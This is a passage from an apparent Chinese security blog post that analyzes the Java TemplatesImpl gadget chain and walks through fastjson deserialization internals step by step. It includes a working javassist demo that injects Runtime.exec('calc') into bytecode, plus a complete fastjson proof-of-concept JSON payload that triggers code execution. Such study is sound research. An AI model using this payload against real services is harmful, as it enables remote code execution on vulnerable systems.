<h2 id="TemplatesImpl"><a href="#TemplatesImpl" class="headerlink" title="TemplatesImpl"></a>TemplatesImpl</h2><p>TemplatesImpl这个类简述功能就是对xsl格式文件生成的字节码转换成XSLTC模板对象，期间会处理字节码，因此重写了defineClass方法，具体描述可查看<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/247044">TemplatesImpl了解</a></p>
<p><img src="/posts/ad3be047/cc2-26.png" title="重写defineClass"></p>
<p>重写了<code>defineClass</code>方法，并且没有定义域，可以在其他类进行调用使用，而<code>ClassLoader#defineClass</code>定义域是受保护的，在很多情况中调用受限，因此这也是<code>TransletClassLoader#defineClass</code>作为很多序列化漏洞入口，而不是使用<code>ClassLoader#defineClass</code></p>
<p>但该<code>defineClass()</code>的调用并不会实例化，需要通过<code>newInstance()</code>进行实例化。</p>
<p>依次看调用情况</p>
<h3 id="defineTransletClasses"><a href="#defineTransletClasses" class="headerlink" title="defineTransletClasses()"></a>defineTransletClasses()</h3><p><code>defineClass</code>在<code>defineTransletClasses</code>方法中被调用</p>
<p><img src="/posts/ad3be047/cc2-27.png" title="defineClass调用"></p>
<p>其中需要的满足条件：</p>
<ol>
<li><p><code>_bytecodes</code>不能为空，为空会直接抛出异常</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> (_bytecodes == <span class="literal">null</span>) &#123;</span><br><span class="line">    <span class="type">ErrorMsg</span> <span class="variable">err</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ErrorMsg</span>(ErrorMsg.NO_TRANSLET_CLASS_ERR);</span><br><span class="line">    <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">TransformerConfigurationException</span>(err.toString());</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p><code>_tfactory</code>需要实例化<br>创建的<code>TransletClassLoader</code>(Translet类的加载器)对象，其中<code>_tfactory.getExternalExtensionsMap()</code>中的<code>_tfactory</code>对象为<code>TransformerFactoryImpl</code>类对象，等同于调用<code>TransformerFactoryImpl.getExternalExtensionsMap()</code>方法，但其中<code>_tfactory</code>对象初始赋值为null，直接执行会报错，因此需要将<code>_tfactory</code>进行实例化，才能调用<code>TransformerFactoryImpl.getExternalExtensionsMap()</code>方法。</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="type">TransletClassLoader</span> <span class="variable">loader</span> <span class="operator">=</span> (TransletClassLoader)</span><br><span class="line">           AccessController.doPrivileged(<span class="keyword">new</span> <span class="title class_">PrivilegedAction</span>() &#123;</span><br><span class="line">               <span class="keyword">public</span> Object <span class="title function_">run</span><span class="params">()</span> &#123;</span><br><span class="line">                   <span class="keyword">return</span> <span class="keyword">new</span> <span class="title class_">TransletClassLoader</span>(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());</span><br><span class="line">               &#125;</span><br><span class="line">           &#125;);</span><br></pre></td></tr></table></figure>
<p>两种实现方法都可以实例化，第一种通过<code>TransformerFactoryImpl()</code>构造方法实现实例化对象，第二种通过反射直接实现实例化对象。</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">setFieldValue(templates, <span class="string">&quot;_tfactory&quot;</span>, <span class="keyword">new</span> <span class="title class_">TransformerFactoryImpl</span>());</span><br><span class="line">setFieldValue(templates, <span class="string">&quot;_tfactory&quot;</span>, TransformerFactoryImpl.class.newInstance());</span><br></pre></td></tr></table></figure>
</li>
<li><p><code>父类需要为ABSTRACT_TRANSLET</code>类<br>通过for循环对字节文件类进行循环定义并赋值给class数组，其中会判断当前获取的字节类的父类是否为<code>ABSTRACT_TRANSLET</code>类，是的话会讲该类序号赋值给<code>_transletIndex</code>，否则不是的话会抛出异常（表意为只有存在父类为<code>ABSTRACT_TRANSLET</code>类的<code>translet</code>类才能被实例化），从而在<code>getTransletInstance</code>类中的<code>AbstractTranslet</code>实例化步骤将父类为<code>ABSTRACT_TRANSLET</code>的类进行实例化</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">for</span> (<span class="type">int</span> <span class="variable">i</span> <span class="operator">=</span> <span class="number">0</span>; i &lt; classCount; i++) &#123;</span><br><span class="line">               _class[i] = loader.defineClass(_bytecodes[i]);</span><br><span class="line">               <span class="keyword">final</span> <span class="type">Class</span> <span class="variable">superClass</span> <span class="operator">=</span> _class[i].getSuperclass();</span><br><span class="line"></span><br><span class="line">               <span class="comment">// Check if this is the main class</span></span><br><span class="line">               <span class="keyword">if</span> (superClass.getName().equals(ABSTRACT_TRANSLET)) &#123;</span><br><span class="line">                   _transletIndex = i;</span><br><span class="line">               &#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p><code>_bytecodes</code>字节码需要设置为byte[][]数组，<code>_bytecodes</code>变量声明为byte[][]类型，如果直接通过javassist toBytecode()生成byte[]数组运行会报错。<br><img src="/posts/ad3be047/cc2-33.png" title="_bytecodes数组"><br><img src="/posts/ad3be047/cc2-34.png" title="_bytecodes数组"><br>因此需要将一维数组转化为二维数组。</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="type">byte</span>[] bytecode=ct.toBytecode();</span><br><span class="line"><span class="type">byte</span>[][] bytecodes=<span class="keyword">new</span> <span class="title class_">byte</span>[][]&#123;bytecode&#125;;</span><br></pre></td></tr></table></figure></li>
</ol>
<p>接着查看<code>defineTransletClasses</code>方法的上层调用情况<br>其中有三处对该方法进行了调用，其中只用<code>getTransletInstance</code>方法有上层调用，其他两个方法没有被其他方法进行调用。</p>
<p><img src="/posts/ad3be047/cc2-28.png" title="getTransletInstance调用"></p>
<h3 id="getTransletInstance"><a href="#getTransletInstance" class="headerlink" title="getTransletInstance()"></a>getTransletInstance()</h3><p><img src="/posts/ad3be047/cc2-29.png" title="getTransletInstance调用"></p>
<p>其中需要的满足条件：</p>
<ol>
<li><p><code>_name</code>不能为空，为空会直接返回<code>null</code></p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> (_name == <span class="literal">null</span>) <span class="keyword">return</span> <span class="literal">null</span>;</span><br></pre></td></tr></table></figure>
</li>
<li><p><code>_class</code>必须为空，才能调用<code>defineTransletClasses</code>方法</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> (_class == <span class="literal">null</span>) defineTransletClasses();</span><br></pre></td></tr></table></figure></li>
</ol>
<p>最后通过创建<code>AbstractTranslet</code>对象将class文件类进行实例化</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="type">AbstractTranslet</span> <span class="variable">translet</span> <span class="operator">=</span> (AbstractTranslet) _class[_transletIndex].newInstance();</span><br></pre></td></tr></table></figure>

<p>接着查看<code>getTransletInstance</code>方法的上层调用情况</p>
<p><img src="/posts/ad3be047/cc2-30.png" title="getTransletInstance调用"></p>
<p><code>newTransformer()</code>方法进行了调用</p>
<h3 id="newTransformer"><a href="#newTransformer" class="headerlink" title="newTransformer()"></a>newTransformer()</h3><p>在调用构造函数的时候调用了<code>getTransletInstance</code>方法，返回Translet类的实例，其中没有需要的满足条件。</p>
<p>接着查看<code>newTransformer()</code>方法的上层调用情况</p>
<p><img src="/posts/ad3be047/cc2-31.png" title="newTransformer调用"></p>
<p>其中有5处显示进行了调用，但只有<code>getOutputProperties</code>方法调用的本类的<code>newTransformer()</code>方法，其他四种都是调用的其他类重写的<code>newTransformer()</code>方法。</p>
<h3 id="getOutputProperties"><a href="#getOutputProperties" class="headerlink" title="getOutputProperties()"></a>getOutputProperties()</h3><p><img src="/posts/ad3be047/cc2-32.png" title="getOutputProperties调用"></p>
<p>该方法直接执行了<code>newTransforme</code>方法，没有其他条件限制，查询<code>getOutputProperties</code>的上层调用，没有在本类发现其调用，因此最后的执行方法就在<code>getOutputProperties</code></p>
<h3 id="完整链"><a href="#完整链" class="headerlink" title="完整链"></a>完整链</h3><p>到<code>newTransformer</code>方法执行就能达到触发了，他上层<code>getOutputProperties</code>方法也进行了调用，也可以算进去当作延伸出来的链。</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">getOutputProperties()</span><br><span class="line">    newTransformer()</span><br><span class="line">        getTransletInstance()</span><br><span class="line">            defineTransletClasses()</span><br><span class="line">                defineClass()</span><br></pre></td></tr></table></figure>

<h3 id="实现demo"><a href="#实现demo" class="headerlink" title="实现demo"></a>实现demo</h3><figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="comment">//创建CtClass对象容器</span></span><br><span class="line">        ClassPool pool2=ClassPool.getDefault();</span><br><span class="line">        <span class="comment">//pool2.insertClassPath(new ClassClassPath(AbstractTranslet.class));</span></span><br><span class="line">        <span class="comment">//创建新类Exp2</span></span><br><span class="line">        CtClass ct=pool2.makeClass(<span class="string">&quot;People2&quot;</span>);</span><br><span class="line">        <span class="comment">//设置People2类的父类为AbstractTranslet，满足实例化条件</span></span><br><span class="line">        ct.setSuperclass(pool2.get(AbstractTranslet.class.getName()));</span><br><span class="line">        <span class="comment">//创建构造函数</span></span><br><span class="line">        CtConstructor cons=ct.makeClassInitializer();</span><br><span class="line">        <span class="comment">//向构造函数插入字节码</span></span><br><span class="line">        cons.insertBefore(<span class="string">&quot;java.lang.Runtime.getRuntime().exec(\&quot;calc\&quot;);&quot;</span>);</span><br><span class="line">        <span class="comment">//javassist转换字节码并转化为二位数组</span></span><br><span class="line">        <span class="type">byte</span>[] bytecode=ct.toBytecode();</span><br><span class="line">        <span class="type">byte</span>[][] bytecodes=<span class="keyword">new</span> <span class="title class_">byte</span>[][]&#123;bytecode&#125;;</span><br><span class="line">        <span class="comment">//实例化TemplatesImpl对象</span></span><br><span class="line">        TemplatesImpl templates=TemplatesImpl.class.newInstance();</span><br><span class="line">        <span class="comment">//设置满足条件属性_bytecodes为恶意构造字节码</span></span><br><span class="line">        setFieldValue(templates,<span class="string">&quot;_bytecodes&quot;</span>,bytecodes);</span><br><span class="line">        <span class="comment">//设置满足条件属性_class为空</span></span><br><span class="line">        setFieldValue(templates,<span class="string">&quot;_class&quot;</span>,<span class="literal">null</span>);</span><br><span class="line">        <span class="comment">//设置满足条件属性_name不为空，任意赋值都行</span></span><br><span class="line">        setFieldValue(templates,<span class="string">&quot;_name&quot;</span>,<span class="string">&quot;test&quot;</span>);</span><br><span class="line">        <span class="comment">//设置满足条件属性_tfactory实例化，效果等同于new TransformerFactoryImpl()</span></span><br><span class="line">        setFieldValue(templates, <span class="string">&quot;_tfactory&quot;</span>, TransformerFactoryImpl.class.newInstance());</span><br><span class="line">        <span class="comment">//执行newTransformer()方法</span></span><br><span class="line">        templates.newTransformer();</span><br><span class="line">        <span class="comment">//执行getOutputProperties(),getOutputProperties为newTransformer上层调用，执行效果相同，就是多了个执行步骤</span></span><br><span class="line">        templates.getOutputProperties();</span><br><span class="line">&#125;</span><br><span class="line">    <span class="comment">//通过反射给对象属性赋值，避免代码冗余繁琐</span></span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">setFieldValue</span><span class="params">(<span class="keyword">final</span> Object obj, <span class="keyword">final</span> String fieldName, <span class="keyword">final</span> Object value)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">Field</span> <span class="variable">field</span> <span class="operator">=</span> obj.getClass().getDeclaredField(fieldName);</span><br><span class="line">        field.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        field.set(obj, value);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p><img src="/posts/ad3be047/cc2-35.png" title="实现demo"></p>
<h1 id="0x04、fastjson-TemplatesImpl利用分析"><a href="#0x04、fastjson-TemplatesImpl利用分析" class="headerlink" title="0x04、fastjson-TemplatesImpl利用分析"></a>0x04、fastjson-TemplatesImpl利用分析</h1><p>只有正向分析了解执行过程了，逆向分析思路实在难理</p>
<h2 id="POC"><a href="#POC" class="headerlink" title="POC"></a>POC</h2><p>参考网上的POC:</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">package</span> com.test.fastjson;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.alibaba.fastjson.JSON;</span><br><span class="line"><span class="keyword">import</span> com.alibaba.fastjson.parser.Feature;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;</span><br><span class="line"><span class="keyword">import</span> javassist.*;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.util.Base64;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Payload</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> String <span class="title function_">generateEvil</span><span class="params">()</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">ClassPool</span> <span class="variable">pool</span> <span class="operator">=</span> ClassPool.getDefault();</span><br><span class="line">        <span class="type">CtClass</span> <span class="variable">clas</span> <span class="operator">=</span> pool.makeClass(<span class="string">&quot;Evil&quot;</span>);</span><br><span class="line">        pool.insertClassPath(<span class="keyword">new</span> <span class="title class_">ClassClassPath</span>(AbstractTranslet.class));</span><br><span class="line">        <span class="type">String</span> <span class="variable">cmd</span> <span class="operator">=</span> <span class="string">&quot;Runtime.getRuntime().exec(\&quot;calc\&quot;);&quot;</span>;</span><br><span class="line">        clas.makeClassInitializer().insertBefore(cmd);</span><br><span class="line">        clas.setSuperclass(pool.getCtClass(AbstractTranslet.class.getName()));</span><br><span class="line"></span><br><span class="line">        <span class="comment">//clas.writeFile(&quot;./&quot;);</span></span><br><span class="line"></span><br><span class="line">        <span class="type">byte</span>[] bytes = clas.toBytecode();</span><br><span class="line">        <span class="type">String</span> <span class="variable">EvilCode</span> <span class="operator">=</span> Base64.getEncoder().encodeToString(bytes);</span><br><span class="line">        <span class="comment">//System.out.println(EvilCode);</span></span><br><span class="line">        <span class="keyword">return</span> EvilCode;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="keyword">final</span> <span class="type">String</span> <span class="variable">GADGAT_CLASS</span> <span class="operator">=</span> <span class="string">&quot;com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl&quot;</span>;</span><br><span class="line">        <span class="type">String</span> <span class="variable">evil</span> <span class="operator">=</span> Payload.generateEvil();</span><br><span class="line">        <span class="type">String</span> <span class="variable">PoC</span> <span class="operator">=</span> <span class="string">&quot;&#123;\&quot;@type\&quot;:\&quot;&quot;</span> + GADGAT_CLASS + <span class="string">&quot;\&quot;,\&quot;_bytecodes\&quot;:[\&quot;&quot;</span> + evil + <span class="string">&quot;\&quot;],&#x27;_name&#x27;:&#x27;a.b&#x27;,&#x27;_tfactory&#x27;:&#123;&#125;,\&quot;_outputProperties\&quot;:&#123; &#125;,&quot;</span>+<span class="string">&quot;&#125;\n&quot;</span>;</span><br><span class="line">        JSON.parseObject(PoC,Object.class, Feature.SupportNonPublicField);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>前半段就是<code>javassist</code>字节码生成恶意代码，在上面<code>ClassLoader</code>和<code>TemplatesImpl</code>分析的时候提过了，区别就是生成的恶意字节码经过<code>Base64</code>编码过一次，为什么会经过<code>Base64</code>编码，分析过程去了解。</p>
<p>下半段主程序就是<code>fastjson</code>反序列化<code>TemplatesImpl</code>类，加载恶意字节码，同时添加<code>TemplatesImpl</code>执行需要满足的几个条件属性，最后添加<code>_outputProperties</code>字段目的经过转换调用<code>getoutputProperties()</code>方法执行恶意代码，后面又加了一个<code>_name</code>参数和<code>allowedProtocols</code>参数。</p>
<p>最后在<code>parseObject</code>反序列化的时候添加了<code>Feature.SupportNonPublicField</code>参数，突破访问私有属性限制，因为<code>TemplatesImpl</code>类大部分属性都是<code>private</code>保护属性，fastjson默认无法序列化保护属性的变量。</p>
<h2 id="分析过程"><a href="#分析过程" class="headerlink" title="分析过程"></a>分析过程</h2><p>调试首先进入对应参数类型的<code>parseObject</code>方法<br><img src="/posts/ad3be047/fj1-16.png" title="parseObject方法"></p>
<p>判断input输入是否为空，然后创建默认<code>JSONparser</code>解析器<br><img src="/posts/ad3be047/fj1-17.png" title="JSONparser"></p>
<p>跟进<code>DefaultJSONParser</code>方法，先通过分词器(laxer,用于对input值进行符号分割，获取对应的截选字段)获取开头字符是否是”{“</p>
<p><img src="/posts/ad3be047/fj1-18.png" title="JSONparser"></p>
<p>是的话，就设置<code>token</code>为<code>JSONtoken.LBRACE</code>，值为12</p>
<p><img src="/posts/ad3be047/fj1-19.png" title="token"></p>
<p>然后对解析器<code>parser</code>进行<code>parseObject</code>序列化操作，<code>Type</code>对象为输入的<code>Object.class</code>对象</p>
<p><img src="/posts/ad3be047/fj1-20.png" title="parseObject"></p>
<p>跟进<code>parseObject</code>方法，判断<code>token</code>所属类型，然后获取反序列化解析器</p>
<p><img src="/posts/ad3be047/fj1-21.png" title="parseObject"><br><img src="/posts/ad3be047/fj1-22.png" title="getDeserializer"></p>
<p>跟进<code>getDeserializer</code>方法，根据Type（即输入的<code>Object.class</code>对象）获取对应的反序列化器，获取的反序列化器为<code>JavaObjectDeserializer</code></p>
<p><img src="/posts/ad3be047/fj1-23.png" title="getDeserializer"><br><img src="/posts/ad3be047/fj1-24.png" title="getDeserializer"></p>
<p>获取反序列化器后，判断对象类型后，对反序列化器进行反序列化操作。</p>
<p><img src="/posts/ad3be047/fj1-25.png" title="parse"></p>
<p>跟进<code>parse</code>方法</p>
<p><img src="/posts/ad3be047/fj1-26.png" title="parse"></p>
<p>通过<code>Token</code>判断后进入判断体分支，创建新的<code>json</code>对象，然后对该<code>json</code>对象和<code>fieldName</code>字段（当前类对象为Object，没有解析字段，所以值为null）进行反序列化解析</p>
<p><img src="/posts/ad3be047/fj1-27.png" title="parse"></p>
<p>再次跟进<code>parseObject</code>方法</p>
<p>前面的一大段操作都是通过分词器<code>laxer</code>获取的字符进行判断是否合法</p>
<p><img src="/posts/ad3be047/fj1-28.png" title="input合法判断"></p>
<p>一直到key值的判断，key为获取的<code>@type</code>，typeName为<code>@type</code>的值即输入的<code>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</code></p>
<p><img src="/posts/ad3be047/fj1-29.png" title="key判断"></p>
<p>通过加载类获取一个<code>TemplatesImpl</code>类对象<code>clazz</code></p>
<p><img src="/posts/ad3be047/fj1-30.png" title="获取TemplatesImpl类对象"></p>
<p>获取<code>TemplatesImpl</code>类对象后，再次寻找对应的反序列化器</p>
<p><img src="/posts/ad3be047/fj1-31.png" title="获取TemplatesImpl类对象"></p>
<p>由于<code>TemplatesImpl</code>类并不在<code>derializers</code>的列表中，因此<code>derializer</code>为<code>null</code>，<code>derializer</code>列表大部分为<code>hashmap</code></p>
<p><img src="/posts/ad3be047/fj1-32.png" title="derializer为null"></p>
<p>但<code>type(TemplatesImpl)</code>属于<code>Class</code>，因此进入另一个获取反序列化器的方法<code>getDeserializer((Class&lt;?&gt;) type, type)</code>，继续跟进<code>getDeserializer</code>方法<br>前半段依旧是获取<code>type</code>的反序列化器，同样<code>derializer</code>还是为<code>null</code></p>
<p><img src="/posts/ad3be047/fj1-33.png" title="getDeserializer"></p>
<p>不同上一个获取反序列化器的方法，接下来获取clazz的类名即（com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl），然后判断该类名是否是黑名单（java.lang.Thread）中的内容</p>
<p><img src="/posts/ad3be047/fj1-34.png" title="黑名单判断"></p>
<p>后面就是对<code>className</code>进行分类判断，最后没有找到对应类的反序列化器，最后通过<code>createJavaBeanDeserializer</code>方法对当前<code>clazz</code>创建一个反序列化器</p>
<p><img src="/posts/ad3be047/fj1-35.png" title="createJavaBeanDeserializer"></p>
<p>跟进<code>createJavaBeanDeserializer</code>方法，其中<code>asmEnable</code>默认开启，然后判断<code>clazz</code>类是否支持字节码操作，然后进行<code>JavaBeanInfo</code>创建</p>
<p><img src="/posts/ad3be047/fj1-36.png" title="JavaBeanInfo"></p>
<p>在<code>setter/getter</code>分析中提到的<code>build</code>方法主要是通过反射遍历获取类中的方法名和数据保存在<code>Fieldlist</code>中然后放入<code>beaninfo</code>数组中。</p>
<p><img src="/posts/ad3be047/fj1-14.png" title="beaninfo"></p>
<p><code>beaninfo</code>创建后，后面的代码部分就是针对<code>Beaninfo</code>的字段属性进行循环遍历检查合法性，属性查询完后，创建<code>JavaBeanDeserializer</code>反序列化器</p>
<p><img src="/posts/ad3be047/fj1-37.png" title="JavaBeanDeserializer"><br><img src="/posts/ad3be047/fj1-38.png" title="JavaBeanDeserializer"></p>
<p><code>JavaBeanDeserializer</code>方法中先是声明<code>beanInfo.sortedFields</code>的<code>FieldDeserializer</code>反序列化器，然后循环读取<code>sortedFields</code>排序后的属性给<code>fieldInfo</code>变量，然后创建新的字段反序列化器<code>createFieldDeserializer</code>，最后新反序列化器放入<code>sortedFieldDeserializers</code>数组中</p>
<p><img src="/posts/ad3be047/fj1-39.png" title="sortedFieldDeserializers"></p>
<p>后半段是循环获取<code>beanInfo.fields</code>的属性，然后通过<code>getFieldDeserializer</code>方法在<code>sortedFieldDeserializers</code>数组中查找是否匹配，匹配的话就放入到<code>fieldDeserializers</code>数组当中。</p>
<p><img src="/posts/ad3be047/fj1-40.png" title="sortedFieldDeserializers"></p>
<p>到此，<code>JavaBeanDeserializer</code>反序列化器创建成功，并放入到反序列化器当中，最后返回反序列化器<code>derializer</code></p>
<p><img src="/posts/ad3be047/fj1-41.png" title="derializer"></p>
<p>获取到反序列化器后，正式对该反序列化器进行反序列化操作</p>
<p><img src="/posts/ad3be047/fj1-42.png" title="derialize"></p>
<p>反序列化的前半部分都是对类的一些属性信息进行判断（<code>token</code>的判断，<code>laxer</code>分词器的创建等）</p>
<p><img src="/posts/ad3be047/fj1-43.png" title="derialize"></p>
<p>通过循环读取<code>sortedFieldDeserializers</code>数组获取反序列化器中的属性数据，获取过后再循环判断获取的类的分类所属，在进行对应类属性赋值</p>
<p><img src="/posts/ad3be047/fj1-44.png" title="sortedFieldDeserializers"></p>
<p>经过上面的对<code>sortedFieldDeserializers</code>获取的当前属性信息的操作后，创建对解析器对象进行实例化</p>
<p><img src="/posts/ad3be047/fj1-45.png" title="createInstance"><br><img src="/posts/ad3be047/fj1-46.png" title="实例化对象"></p>
<p>实例化对象后，开始解析该对象在解析器中的字段属性</p>
<p><img src="/posts/ad3be047/fj1-47.png" title="解析字段属性"></p>
<p>字段反序列化器会模糊匹配<code>key</code>，跟进<code>smartMatch</code>方法</p>
<p><img src="/posts/ad3be047/fj1-48.png" title="smartMatch"></p>
<p>先判断<code>Key</code>是否存在，存在然后通过<code>getFieldDeserializer</code>方法查找<code>key</code>的反序列化器，如果找不到该<code>key</code>的反序列化器，然后判断<code>key</code>是否以<code>is</code>为开头，随后循环获取<code>sortedFieldDeserializers</code>数组内容获取其中的<code>fieldInfo、fieldClass、fieldName</code>等属性</p>
<p><img src="/posts/ad3be047/fj1-49.png" title="smartMatch"></p>
<p>因为在<code>getFieldDeserializer</code>中匹配<code>Key</code>是否在<code>sortedFieldDeserializers</code>数组中，由于数组中的值没有”_”开头，因此找不到<code>key</code>的反序列化器</p>
<p><img src="/posts/ad3be047/fj1-50.png" title="getFieldDeserializer"></p>
<p>条件都不满足，找不到<code>FieldDeserializer</code>属性反序列化器，然后就对属性进行字符替换操作，此时的<code>Key</code>由<code>&quot;_outputProperties&quot;</code>被替换成<code>&quot;outputProperties&quot;</code></p>
<p><img src="/posts/ad3be047/fj1-51.png" title="replaceAll"><br><img src="/posts/ad3be047/fj1-52.png" title="replaceAll"></p>
<p>然后再次调用<code>getFieldDeserializer</code>方法，查询是否存在<code>key2</code>的反序列化器，此时<code>sortedFieldDeserializers</code>数组中存在<code>outputProperties</code>字段，因此能够找到反序列化器</p>
<p><img src="/posts/ad3be047/fj1-54.png" title="getFieldDeserializer"><br><img src="/posts/ad3be047/fj1-55.png" title="outputProperties"></p>
<p>返回属性反序列化器，此时获取到<code>getoutputProperties</code>方法（build中提到的getter&#x2F;setter建立会存储get和set方法，反序列化器查询匹配到字段后会返回该方法的反序列化器）</p>
<p><img src="/posts/ad3be047/fj1-56.png" title="getoutputProperties"></p>
<p>找到属性反序列化器后，对该属性进行反序列化解析</p>
<p><img src="/posts/ad3be047/fj1-57.png" title="parseField"></p>
<p>解析过程中通过<code>getFieldValueDeserilizer</code>方法获取属性值的反序列化器，并对属性值反序列化器进行反序列化解析获取值</p>
<p><img src="/posts/ad3be047/fj1-58.png" title="getFieldValueDeserilizer"></p>
<p>然后将获取的值通过<code>setValue</code>方法赋值给字段属性</p>
<p><img src="/posts/ad3be047/fj1-59.png" title="setValue"></p>
<p>跟进<code>setValue</code>方法，通过反射获取字段属性的方法</p>
<p><img src="/posts/ad3be047/fj1-60.png" title="setValue"></p>
<p>最后通过反射执行<code>Object</code>对象的<code>Method</code>方法，即执行<code>TemplatesImpl.getoutputProperties()</code>,触发漏洞</p>
<p><img src="/posts/ad3be047/fj1-61.png" title="反射执行方法"><br><img src="/posts/ad3be047/fj1-62.png" title="触发漏洞"></p>
<h2 id="流程总结"><a href="#流程总结" class="headerlink" title="流程总结"></a>流程总结</h2><p>根据上面的分析过程，稍微理一下fastjson的执行流程</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">JSON对象解析</span><br><span class="line">  -&gt;创建默认JSON解析器parser（方法：DefaultJSONParser）</span><br><span class="line">    -&gt;对解析器pareser进行解析序列化解析（方法：parseObject）</span><br><span class="line">      -&gt;根据token获取对应反序列化器deserializer（方法：getDeserializer）</span><br><span class="line">        -&gt;对反序列化器deserializer进行反序列化解析（方法：deserialize）</span><br><span class="line">          -&gt;对对象和方法名进行解析（方法：pareseObject）</span><br><span class="line">            -&gt;获取key值(@type)，类加载key对象Class</span><br><span class="line">              -&gt;搜寻类对象的反序列化器</span><br><span class="line">                -&gt;搜寻不到，再创建反序列化器（方法：createJavaBeanDeserializer）</span><br><span class="line">                -&gt;过程中，build javabeaninfo信息，存储setter/getter信息放入Fieldlist中</span><br><span class="line">                -&gt;过程中，对Fieldlist字段进行创建字段反序列化器createFieldDeserializer</span><br><span class="line">                -&gt;最后反序列化器JavaBeanDeserializer创建成功</span><br><span class="line">                  -&gt;正式对反序列化器进行反序列化操作(方法：deserialize)</span><br><span class="line">                    -&gt;通过sortedFieldDeserializers获取字段数据，然后实例化对象</span><br><span class="line">                      -&gt;解析对象字段属性进行模糊匹配查找属性前缀get/set是否存在，&quot;_&quot;符号进行删除等操作</span><br><span class="line">                        -&gt;对方法查找方法的反序列化器（方法：getFieldDeserializer）</span><br><span class="line">                          -&gt;通过方法反序列化器对方法属性进行解析(获取到类方法名)，通过setValue方法给字段赋值</span><br><span class="line">                            -&gt;通过反射调用执行方法</span><br></pre></td></tr></table></figure>

<h2 id="base64编码问题"><a href="#base64编码问题" class="headerlink" title="base64编码问题"></a>base64编码问题</h2><p>在解析字段属性中，解析到<code>&quot;_bytecodes&quot;</code></p>
<p><img src="/posts/ad3be047/fj1-63.png" title="_bytecodes解析"></p>
<p>然后获取对应反序列化器，对反序列化器进行再次解析</p>
<p><img src="/posts/ad3be047/fj1-64.png" title="反序列化器解析"></p>
<p>再次跟进，此时属性反序列化器为<code>ObjectArrayCodec</code>，调用<code>ObjectArrayCodec</code>的反序列化方法<code>deserialze</code></p>
<p><img src="/posts/ad3be047/fj1-65.png" title="反序列化器解析"></p>
<p>过程中会对参数内容集合进行解析</p>
<p><img src="/posts/ad3be047/fj1-66.png" title="反序列化器解析"></p>
<p>进入对集合进行解析，此时<code>laxer</code>经过<code>nexttoken()</code>方法后重新赋值，再次对<code>value</code>进行反序列化解析</p>
<p><img src="/posts/ad3be047/fj1-69.png" title="deserialze"></p>
<p>跟进反序列化方法，此时<code>laxer</code>匹配<code>JSONToken.LITERAL_STRING</code>，调用<code>bytesValue()</code>方法</p>
<p><img src="/posts/ad3be047/fj1-67.png" title="解析字段"></p>
<p>跟进<code>bytesValue()</code>方法，在这里对<code>txt</code>也就是<code>Input</code>的内容进行<code>base64</code>解码，所以<code>_bytecodes</code>需要经过base64编码</p>
<p><img src="/posts/ad3be047/fj1-68.png" title="base64解码"></p>
<h1 id="0x05、总结"><a href="#0x05、总结" class="headerlink" title="0x05、总结"></a>0x05、总结</h1><p>跟完TemplatesImpl链，头都大了，总的来说就是通过创建序列化器去存储序列化对象的相关信息，再通过反序列化器解析反序列化类对象、类字段、方法等信息，最后再解析反序列化器。跟一遍下来的感觉就是不停的创建反序列化器，再解析反序列化器的内容，结合getter触发代码执行，虽然绕了很多，但在这里面也学到了很多，理解的过程也不完全，很多细节上的代码段也没理解透意思，就在大体框架走了一遍，可能还存在一些理解错误的地方，后面遇到了再改吧。</p>
